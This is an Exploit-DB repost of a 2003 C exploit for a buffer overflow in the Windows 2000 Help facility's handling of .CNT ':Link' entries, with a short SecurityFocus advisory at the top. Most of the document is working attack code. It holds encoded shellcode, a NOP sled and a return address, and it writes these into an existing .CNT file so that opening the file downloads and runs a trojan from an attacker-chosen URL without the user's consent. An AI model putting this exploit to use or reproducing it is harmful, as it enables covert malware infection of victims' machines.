https://www.exploit-db.com/exploits/22354

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/7102/info

The Microsoft Windows 2000 Help facility does not perform sufficient bounds checking on .cnt files. If a .cnt file containing an unusually long :Link URI was opened by the Windows Help facility, a buffer would be overrun, allowing the execution of arbitrary code.

/*************************************************
 * s0h - Skin Of Humanity.
 * http://s0h.cc
 *
 * Title : Win32hlp exploit for : ":LINK overflow"
 * Date : Sunday, 9 March, 2003 1:00 AM 
 *
 * -----------------------------------------------
 *  
 * Archive : http://s0h.cc/exploit/s0h_Win32hlp.c
 * Binary : http://s0h.cc/exploit/s0h_Win32hlp.exe
 * 
 * -----------------------------------------------
 * Discovered by ThreaT <[email protected]>.
 * Coded by ThreaT <[email protected]>
 * Hompage : http://s0h.cc/~threat/
 * 
 * Winhlp32.exe exploit for ':LINK' overflow !
 * 
 * -----------------------------------------------
 *
 * This exploit can trap a .CNT file (file with .-
 * HLP files) with the arbitrary code who can dow-
 * nload and execute a trojan without user ask.
 *
 * -----------------------------------------------
 * 
 * Compiling : cl /nologo s0h_Win32hlp.c
 * Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset]
 * Eq : C:>s0h_Win32hlp.exe http://www.chez.com/mvm/trojan.exe c:WINNTHelpmplayer2.cnt 4
 * 
 * <trojan> = host to download the trojan (http:/-
 * /blah.plof/trojan.exe).
 * 
 * <CNT file> = The CNT file.
 * 
 * [offset] = Optionnal. This one defined a numbe-
 * r between 0 and 15 that can play with the retu-
 * rn address. Generaly, you must used 4 if the .-
 * HLP file is called by an application.
 * 
 * -----------------------------------------------
 * This exploit was tested on :
 * 	- Windows 2000 PRO/SERVER (fr) SP0
 * 	- Windows 2000 PRO/SERVER (fr) SP1
 *	- Windows 2000 PRO/SERVER (fr) SP2
 *
 ************************************************/


#include <windows.h>

#define taille	270
#define VulnLen	650

int main (int argc, char *argv[]) {

	HANDLE ExploitFile;
	DWORD lpNumberOfBytesWritten, lpFileSizeHigh, FileSize;

	int i,j, len, RetByte=0xE5;

	char *file, *url;

unsigned char *Shellcode, *buffer,

RealGenericShellcode[] = 
"x68x5Ex56xC3x90x8BxCCxFFxD1x83xC6x0Ex90x8BxFExAC"
"x34x99xAAx84xC0x75xF8"

"x72xebxf3xa9xc2xfdx12x9ax12xd9x95x12xd1x95x12x58x12xc5xbdx91"
"x12xe9xa9x9axedxbdx9dxa1x87xecxd5x12xd9x81x12xc1xa5x9ax41x12"
"xc2xe1x9ax41x12xeax85x9ax69xcfx12xeaxbdx9ax69xcfx12xcaxb9x9a"
"x49x12xc2x81xd2x12xadx03x9ax69x9axedxbdx8dx12xafxa2xedxbdx81"
"xedx93xd2xbax42xecx73xc1xc1xaax59x5axc6xaax50xffx12x95xc6xc6"
"x12xa5x16x14x9dx9ex5ax12x81x12x5axa2x58xecx04x5ax72xe5xaax42"
"xf1xe0xdcxe1xd8xf3x93xf3xd2xcax71xe2x66x66x66xaax50xc8xf1xec"
"xebxf5xf4xffx5exddxbdx9dxf6xf7x12x75xc8xc8xccx66x49xf1xf0xf5"
"xfcxd8xf3x97xf3xebxf3x9bx71xccx66x66x66xaax42xcaxf1xf8xb7xfc"
"xe1x5fxddxbdx9dxfcx12x55xcaxcaxc8x66xecx81xcax66x49xaax42xf1"
"xf0xf7xdcxe1xf3x98xf3xd2xcax71xb5x66x66x66x14xd5xbdx89xf3x98"
"xc8x66x49xaax42xf1xe1xf0xedxc9xf3x98xf3xd2xcax71x8bx66x66x66"
"x66x49x71xe6x66x66x66";


printf (" * ***************************************************** *n"
	" *                 s0h - Skin of humanity                *n"
	" *                    http://s0h.cc/                     *n"
	" * ***************************************************** *n"
	"     Win32hlp exploit for : ":LINK overflow"           *n"
	" * ***************************************************** *n"
	" * Discovered by ThreaT <[email protected]>.                 *n"
	" * Coded by ThreaT <[email protected]>                       *n"
	" * Hompage : http://s0h.cc/~threat/                      *n" 
	" * Archive : http://s0h.cc/exploit/s0h_Win32hlp.c        *n"
	" * ***************************************************** *n"
	);

if (argc < 3)
{
	printf(
		" * ***************************************************** *n"
		" * Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset] *n"
		" *                                                       *n"
		" * <trojan> = host to download the trojan (http:/-       *n"
		" * /blah.plof/trojan.exe).                               *n"
		" *                                                       *n"
		" * <CNT file> = The CNT file.                            *n"
		" *                                                       *n"
		" * [offset] = Optionnal. This one defined a number betw- *n"
		" * een 0 and 15 that can play with the return address. - *n"
		" * Generaly, you must used 4 if the .HLP file is called  *n"
		" * by an application.                                    *n"
		" * ***************************************************** *n"	
	);

	ExitProcess (1);
}

if (argv[3]) RetByte = atoi (argv[3]) + 0xE0;

len = taille + strlen (argv[1]) + 2 + 4;
url = (char *) malloc (strlen (argv[1]));
strcpy (url, argv[1]);

/*
* Create the final shellcode
*/

Shellcode = (unsigned char *) malloc (len);

// encrypt the URL
for (i=0;i<strlen (argv[1]); argv[1][i++]^=0x99);

// inject the RealGenericShellcode in the shellcode buffer
for (i=0;i<taille; Shellcode[i]=RealGenericShellcode[i++]);

// append crypted URL to the shellcode buffer
for (i,j=0;i<len - 1;Shellcode[i++]=argv[1][j++]);


Shellcode[len-6]=0x99; // URL delimitation
Shellcode[len-5]=0x2E; // fuck the winhlp32.exe parser

// append the RET ADDR
// Play with this bytes if the xploit don't work
Shellcode[len-4]=0x30;
Shellcode[len-3]=RetByte;
Shellcode[len-2]=0x06;
Shellcode[len-1]=0x00;


/*  Now, we make a vuln string for our exploit */

buffer = (unsigned char *) malloc (VulnLen);
memset (buffer,0,VulnLen);

lstrcpy (buffer,":Link ");
for (i=6; i < VulnLen - len; buffer[i++] = (char)0x90);
for (i,j=0; i < VulnLen; buffer[i++] = Shellcode[j++]);


/* Trap the CNT file specified with the vuln string */

ExploitFile = CreateFile (argv[2],GENERIC_READ+GENERIC_WRITE,
			  FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,
			  OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);

if ( ExploitFile == INVALID_HANDLE_VALUE) {
	printf ("Error : cannot open cnt file '%s'n",argv[2]);
	ExitProcess (1);
}

	FileSize = GetFileSize(ExploitFile, &lpFileSizeHigh);
	FileSize += lpFileSizeHigh*MAXDWORD;

	file = (char *)LocalAlloc (LPTR, FileSize + 2);
	file[0] = 0x0d;
	file[1] = 0x0a;
	file += 2;


	ReadFile(ExploitFile,file,FileSize,&lpNumberOfBytesWritten,NULL);
	
	SetFilePointer (ExploitFile,0,NULL,FILE_BEGIN);
	WriteFile (ExploitFile,buffer,VulnLen,&lpNumberOfBytesWritten,NULL);
	
	file -= 2;
	WriteFile (ExploitFile,file,FileSize+2,&lpNumberOfBytesWritten,NULL);
	
	CloseHandle(ExploitFile);
	
        printf (
		" * *******************************************************n"
		" * The file is now traped and ready to download and exe- *n"
		" * cute :                                                *n"
		" * File : %sn"
		" * At : %sn"
		" * *******************************************************n"
		,argv[2],url);
		
		if (RetByte != 0xE5)
			printf (
				" * *******************************************************n"
				" * You have specified this address : 0x0006%x30          *n"
				" * The abitrary will loaded since an application.        *n"
				" * *******************************************************n"
				,RetByte);
			

	return 0;
}